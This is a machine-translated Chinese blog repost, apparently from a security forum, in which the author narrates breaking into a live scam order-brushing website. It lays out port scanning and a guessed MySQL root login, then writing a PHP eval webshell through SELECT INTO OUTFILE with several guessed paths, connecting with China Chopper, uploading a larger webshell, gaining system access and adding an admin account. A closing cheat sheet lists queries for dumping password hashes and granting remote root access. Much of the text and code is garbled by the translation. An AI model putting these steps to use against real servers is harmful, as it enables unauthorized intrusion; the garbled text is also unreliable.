渗透兼职工资(实战渗透骗子刷单网站)

前段时间看到LOL小智的粉丝因为兼职被骗的新闻。下午,他们无所事事。正好集团里有个骗子的兼职,我就决定试着做一波。

实战渗透骗子刷单网站

果断加骗子好友。先给我发一篇工作流程介绍文章,让我了解一下工作流程,然后让我填一份就业申请表。没想到作弊者还有这些用人流程。难怪一些安全意识不高的朋友会被骗。用假身份填好之后,就开始刷单了。骗子给链接,发去了目标地址,然后找了任何理由结束了聊天。

实战渗透骗子刷单网站

实战渗透骗子刷单网站

实战渗透骗子刷单网站

实战渗透骗子刷单网站

首先,我打开了Awvs扫描仪,发现网站无法访问。网站安装了防火墙,屏蔽了我的ip。骗子的安全意识挺高的,换个ip继续。

不能扫描漏洞。您可以随时扫描端口。Nmap扫描发现3306和3389是开放的。

实战渗透骗子刷单网站

实战渗透骗子刷单网站

实战渗透骗子刷单网站

尝试连接数据库,账号:root,密码:* * *(网站域名),登录成功。平息你的激动。

实战渗透骗子刷单网站

实战渗透骗子刷单网站

看了注册用户信息,找到了管理员账号的密码,但是找不到后台。我尝试过直接写木马,现在对用户信息不感兴趣。写一个字,木马需要知道网站的绝对路径。现在只能猜测了。首先

选择@ @ basedir

检查以下数据库的安装路径:

实战渗透骗子刷单网站

发现站长居然用phpstudy搭建了网站,因为我第一次学会用phpstudy搭建的测试环境进行渗透,所以有点喜出望外,赶紧准备写一个木马:

选择\\ \’?PHP @ eval($ _ POST[\\ \” lzx \\ \”]);\\ \’到outfile \\ \’ c :/PHP study/WWW/1 . PHP \\ \’;

实战渗透骗子刷单网站

没想到管理员没有把网站放在phpstudy默认的WWW目录下,木马写不出来,于是开始了各种尝试:

选择\\ \’?PHP @ eval($ _ POST[\\ \” lzx \\ \”]);\\ \’到outfile \\ \’ c :/PHP study/WWWROOT/1 . PHP \\ \’;

选择\\ \’?PHP @ eval($ _ POST[\\ \” lzx \\ \”]);\\ \’到outfile \\ \’ d :/1 . PHP \\ \’;

选择\\ \’?PHP @ eval($ _ POST[\\ \” lzx \\ \”]);\\ \’到outfile \\ \’ c :/www/1 . PHP \\ \’;

终于找到了网站“c :/www . website-domain-name.com/”的绝对路径,成功写了一句话:

实战渗透骗子刷单网站

斩波器连接:

实战渗透骗子刷单网站

上传马来西亚:

实战渗透骗子刷单网站

访问马来西亚:

实战渗透骗子刷单网站

获取系统权限:

实战渗透骗子刷单网站

下一步是添加管理员帐户。3389远程桌面已连接,但马来西亚的net命令报告了一个错误,尚未找到解决方案。入侵到此结束,找到突破方法后再更新。

总而言之:

MySQL数据库获得访问后的一些信息收集语句:

显示:选择版本();

显示字符集:select @ @ character _ set _ database;

显示数据库的数据库;

显示表格名称:显示表格;

显示计算机名:选择@ @ hostname

显示系统版本:select @ @ version _ compile _ os

显示mysql路径:select @ @ basedir

显示数据库路径:select @ @ datadir

显示root密码:选择用户,密码来自mysql.user

打开外部连接:授予*上的所有权限。*到由\’ 123456 \’标识的\’ root \\\’ @ \\\’% \\ \’并带有授权选项;

和同事沟通后发现,原来是网名管理员的时候,密码设置太简单,服务器配置了密码策略,所以通过更改复杂密码成功添加。

实战渗透骗子刷单网站

实战渗透骗子刷单网站

实战渗透骗子刷单网站

本文作者:Noble_LzX,转载自:https://bbs.ichunqiu.com/forum.php?mod=viewthreadtid=22539highlight

主题测试文章,只做测试使用。发布者:徐浪老师,转转请注明出处:https://www.yuyanwz.com/108465

(0)
上一篇 2022年6月20日 上午8:56
下一篇 2022年6月20日 上午8:58

相关推荐